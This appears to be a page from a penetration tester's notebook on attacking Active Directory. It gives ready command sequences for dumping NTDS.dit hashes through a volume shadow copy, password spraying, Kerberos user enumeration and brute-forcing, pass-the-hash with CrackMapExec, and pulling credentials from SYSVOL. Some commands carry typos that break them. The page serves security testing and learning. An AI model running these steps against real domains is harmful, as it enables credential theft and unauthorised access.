🔧Testing Active Directory

Tools

LogoGitHub - MichaelGrafnetter/DSInternals: Directory Services Internals (DSInternals) PowerShell Module and FrameworkGitHub

Load DSInternals using Powershell

Set-ExecutionPolicy Unrestricted
Install-Module -Name DSInternals

Install Impacket in Linux

sudo apt install python3-impacket

Install BloodHound in Linux

sudo apt install bloodhound
pip install bloodhound

Install Kerbrute

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Install Crackmapexec

Logocrackmapexec | Kali Linux ToolsKali Linux
sudo apt install crackmapexec

Extract the AD hashes

reg SAVE HKLM\SYSTEM c:\temp\sys

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

ESENTUTL /p c:\temp\dit /!1024 /8 /o
$key=Get-BootKey -SystemHiveFilePath c:\temp\sys

Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

Password spraying Active Directory

LogoGitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!GitHub
Import-Module c:\tools\DomainPasswordSpary.ps1
Invoke-DomainPasswordSpary -Password kitty-kat
Invoke-DomainPasswordSpary -PasswordList c:\tools\adpass.txt

Kerberos brute-forcing attacks

Kerbrute

LogoGitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Username Enumeration

./kerbrute userenum -d cybex.com --dc <domain IP> <username list>

Password Attack

./kerbrute passwordspary -d cybex.com --dc <domain IP> <password-list> <password>

CrackMapExec to access and enumerate AD

crackmapexec smb <ip/cidr>

Pass The Hash Attack

crackmapexec smb <domain IP> -u "<username>" -H "<password hash>"
crackmapexec smb <domain IP> -u "username" -p <password.txt>

Investigate the SYSVOL share

LogoUnsecured Credentials: Group Policy Preferences, Sub-technique T1552.006 - Enterprise | MITRE ATT&CK®
smbclient \\\\<Domain IP address>\\sysvol -U <username>

Retrieve a File

smb> get <file name or file location>

Take advantage of legacy data

Jxplorer

  • Open Jxplorer

  • Enter username and password

  • Select a user

  • Select Table Editor Column at the right hand side

  • Decode the Info value (base64 encoded)

Decode Base64 value

echo "<base64 encoded text>" | base64 -d

PreviousIntroduction to IdentitiesNextAdvanced Penetration Testing

Last updated